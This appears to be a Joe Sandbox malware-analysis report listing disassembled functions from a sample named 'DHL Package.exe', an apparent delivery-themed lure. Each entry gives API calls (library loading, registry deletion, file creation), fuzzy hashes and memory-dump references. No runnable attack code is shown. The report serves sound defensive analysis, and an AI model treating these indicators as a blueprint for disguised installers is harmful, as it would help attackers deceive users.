Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f1c290fb996461610dc05284254ea561df87b77a02dec37c2f17ec044b843f5
Instruction ID: a08c2ff1229a9d9811f570562685937cd52cd07e2c0e62d18be643d670bbfbbc
Opcode Fuzzy Hash: 9f1c290fb996461610dc05284254ea561df87b77a02dec37c2f17ec044b843f5
Instruction Fuzzy Hash: B2712471E04228CFDF24CFA8C894BADBBB1FB45305F14806AD846BB281D7386996DF45

Function 00406EB7 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94b25f7611fe17d8713c058a6f17e47c27a0001acd6cd4792c255928ec9836d2
Instruction ID: 79a44bce1fc769ef2bff189c36481e04bceb851a7a33cd9c662bfef797063258
Opcode Fuzzy Hash: 94b25f7611fe17d8713c058a6f17e47c27a0001acd6cd4792c255928ec9836d2
Instruction Fuzzy Hash: 16713571E04218CFDF28CFA8C854BADBBB1FB45305F14806AD856BB281C7786996DF45

Function 00406E03 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0815afd74f654c503a0d6cbf149fd97df88f382804d918d52621f4cf167551eb
Instruction ID: e69ca442741bc9d68f02c0d51ce09155c0cc214200520a71f8620544c8c92ec3
Opcode Fuzzy Hash: 0815afd74f654c503a0d6cbf149fd97df88f382804d918d52621f4cf167551eb
Instruction Fuzzy Hash: 78713731E04229CFEF24CF98C854BADBBB1FB45305F14806AD856BB281C7786996DF45

Function 004020D0 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 004020FB

Part of subcall function 00405443: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
Part of subcall function 00405443: lstrlenW.KERNEL32(00403385,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
Part of subcall function 00405443: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00403385), ref: 0040549E
Part of subcall function 00405443: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll), ref: 004054B0
Part of subcall function 00405443: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
Part of subcall function 00405443: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
Part of subcall function 00405443: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040210C
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402189

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 3fdbe18e2112064b0b2a9084d64d0bdc259e22eb5b579a0d538470750448287f
Instruction ID: cd994d89a020c92b9959873617b7f6e70dfe1d5d911cfc63d75f2132deb71e9d
Opcode Fuzzy Hash: 3fdbe18e2112064b0b2a9084d64d0bdc259e22eb5b579a0d538470750448287f
Instruction Fuzzy Hash: F9219931600114EBCF10AFA5CE4999E7A71AF54358F70413BF515B91E0C7BD8E829A2D

Function 00401B9B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00700108), ref: 00401C0B
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D

Strings

Call, xrefs: 00401BC2, 00401BC8, 00401BE2

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: 5f7d7e138f8698d98c0f764f3aa5b1f83c3d489703198481e529c8cc9450ae44
Instruction ID: 8eac660807c21ed12e13958da8917723c714091cd548f80009266c163e09adae
Opcode Fuzzy Hash: 5f7d7e138f8698d98c0f764f3aa5b1f83c3d489703198481e529c8cc9450ae44
Instruction Fuzzy Hash: 88219673604114DBD720AF94DDC4A5E73B4AB14324725453BF952F72D1C6BCAC418BAD

Function 00402596 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025C9
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025DC
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsl98D6.tmp,00000000,00000011,00000002), ref: 004025F5

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: cdf38385d8dd9cced9e9ebce897e28bf756463deeb7990ccf4e149fd3565b48b
Instruction ID: a7cbbd47cb86148b91354035d47534ffc2f0529ed350b09f7076557a4cc3562b
Opcode Fuzzy Hash: cdf38385d8dd9cced9e9ebce897e28bf756463deeb7990ccf4e149fd3565b48b
Instruction Fuzzy Hash: E5017C71A11504BBEB149FA49E48AAEB77CEF40348F10403AF501B61C0D7B85E40866D

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 63a2f56983bf68ef82dee2aa6a19202fa350abc755d43e3a7d8789ab9979b1a1
Instruction ID: 7386925216f0ba2205b30ed829fcd6135741b8aa1a9a6a78a8dcdd66e79b8f9a
Opcode Fuzzy Hash: 63a2f56983bf68ef82dee2aa6a19202fa350abc755d43e3a7d8789ab9979b1a1
Instruction Fuzzy Hash: 1001F431724220EBEB194B389D09B2A3698E710318F10867FF855F66F1E678CC169B5D

Function 0040242C Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040244E
RegCloseKey.ADVAPI32(00000000), ref: 00402457

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 1398552c6e627ad05fb451d9c53705c000a79c99bd8c8c36d0fc21123b95c68d
Instruction ID: 7bf3b9bda095295facd6d55e439189fe3d0c4b39bd7c4db64debc0172d77640d
Opcode Fuzzy Hash: 1398552c6e627ad05fb451d9c53705c000a79c99bd8c8c36d0fc21123b95c68d
Instruction Fuzzy Hash: 91F09632A00120ABDB10AFA89B4DAAE73B5AF44314F12443FF651B71D1DAFC5D01563E

Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 160cf1c66850f4bed6f66cfa63f2570c3352e267f1b5ac0914f4f272acffcfde
Instruction ID: 0770d74e77a1de07b8bd233185459685766243133281c20ed0e2d1775c5ce133
Opcode Fuzzy Hash: 160cf1c66850f4bed6f66cfa63f2570c3352e267f1b5ac0914f4f272acffcfde
Instruction Fuzzy Hash: 96E09A32A04200DFD704EFA4AE484AEB3B4FF90325B20097FE401F21D1CBB95C00862E

Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 00401587
ShowWindow.USER32(?), ref: 0040159C

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 8a3ace4d73dff19dd78a2f86c5dfd3cf6f912f39cd3c1c8a42cc0f40dfae91d8
Instruction ID: 97b786059bb2d23d50747ff5f4ab461a12b6bf7948ca023dcdd123286d4674a9
Opcode Fuzzy Hash: 8a3ace4d73dff19dd78a2f86c5dfd3cf6f912f39cd3c1c8a42cc0f40dfae91d8
Instruction Fuzzy Hash: 13E04F36B10115ABCB14DFA8ED8086E73B6FB54310760487AE902B3290C675AC11CB68

Function 004067D0 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
GetProcAddress.KERNEL32(00000000,?), ref: 004067FD

Part of subcall function 00406760: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406777
Part of subcall function 00406760: wsprintfW.USER32 ref: 004067B2
Part of subcall function 00406760: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067C6

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
Instruction ID: 7df567e52fbdf149b69dac354ceafd4fa41e0472f673109ceae729e6c8d6a9a9
Opcode Fuzzy Hash: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
Instruction Fuzzy Hash: 26E0863390421096E211A7709F88C7773A8AF89644307483EF946F2080EB38DC31A679

Function 00405ED1 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\DHL Package.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Function 0040598F Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403482,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00405995
GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004059A3

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: b8aeb4fbbaa0c149d17919ad16f2792b2b84c079cfd5907120def0498e2ab647
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: 6DC04CB1244501EED6105B209F08B1B7A90EB50791F1688396146E01A0DA3C8455D97E

Function 6CA72AF8 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 6CA72BB7

Memory Dump Source

Source File: 00000000.00000002.2308297886.000000006CA71000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA70000, based on PE: true

Associated: 00000000.00000002.2308249101.000000006CA70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2308349849.000000006CA74000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2308398309.000000006CA76000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca70000_DHL Package.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8adaffbea89704e89bd707a7c95601ee8f7e8a7ab4729aa90d1b04ad3caaa43a
Instruction ID: f890349a1dfcb3efb840647016c96c32756adb4b816a15a4623e1d732002cff6
Opcode Fuzzy Hash: 8adaffbea89704e89bd707a7c95601ee8f7e8a7ab4729aa90d1b04ad3caaa43a
Instruction Fuzzy Hash: 3E416D7DA0031ADFDF359F64DA8CB993778FB46318F248629E405C6A10D73495CA8AB1

Function 00402889 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028A7

Part of subcall function 00406322: wsprintfW.USER32 ref: 0040632F

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 2bf7c67bec83a18c92f8349ffc07d252c0eb32d1864c4eeb5a603f0f7a51f385
Instruction ID: cf1c11e2e5d3b8127a02fd369e9b9480f26c54c3f48694b4fc9876f358321d4b
Opcode Fuzzy Hash: 2bf7c67bec83a18c92f8349ffc07d252c0eb32d1864c4eeb5a603f0f7a51f385
Instruction Fuzzy Hash: D9E0ED71A14104ABDB01EFA5AE498BFB7B9EB54318B20443BF512B10D1C6B95D119A3A

Function 004023AA Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E1

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 84911039e741b8054182bf8c56606a22799472c4c6cd86ceafd7de9864a58810
Instruction ID: 2036f094aef4cf8fcdd3ce51ebd23e93268b82f075a1b79732874c3119e34eec
Opcode Fuzzy Hash: 84911039e741b8054182bf8c56606a22799472c4c6cd86ceafd7de9864a58810
